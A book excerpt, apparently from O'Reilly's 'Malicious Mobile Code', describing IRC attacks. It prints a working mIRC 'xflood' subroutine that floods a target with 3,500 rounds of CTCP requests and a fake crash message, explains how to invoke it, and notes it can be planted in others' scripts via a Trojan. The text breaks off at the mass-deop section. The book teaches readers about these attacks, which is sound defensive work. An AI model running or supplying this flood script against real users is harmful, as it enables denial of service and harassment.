Examples of IRC Attacks

IRC can be attacked by bots and malicious scripts, or be subject to IRC worms.

Example Malicious Scripts

Here are some examples of malicious subroutines that can be added to a script to cause problems on an IRC channel. I have included a flood attack and mass deop example. Added to a script, they can allow a malicious user to initiate an attack. Added to someone else’s scripts via a Trojan, it can cause them to attack someone else by setting the subroutines to execute on a particular channel keyword (typed by anybody).

CTCP flood

The flood attack script shown in Example 7-2 attempts to create a denial of service attack against a particular user’s account, or get them kicked off the channel because of excessive packet traffic. This script subroutine attempts to request different normal information requests of a client.

Example 7-2. Partial CTCP flood malicious script

xflood { 
set %loop.v 1
:xnext
if (%loop.v>=3500) {goto xdone}
.ctcp $$1 version 
.ctcp $$1 clientinfo 
.ctcp $$1 time 
.ctcp $$1 userinfo
msg $$1 Windows Exception error...Fatal Protect Fault
inc %loop.v 1
goto xnext
:xdone
}

To use this subroutine, a rogue hacker would type /xflood <nickname> on the IRC command line. It would then request four different types of information of the targeted user 3,500 different times. Because of the message wording sent as part of the attack, the attacked user might even think their client program was crashing.

Mass deop attack

Once a hacker has taken control of ...

Get Malicious Mobile Code now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.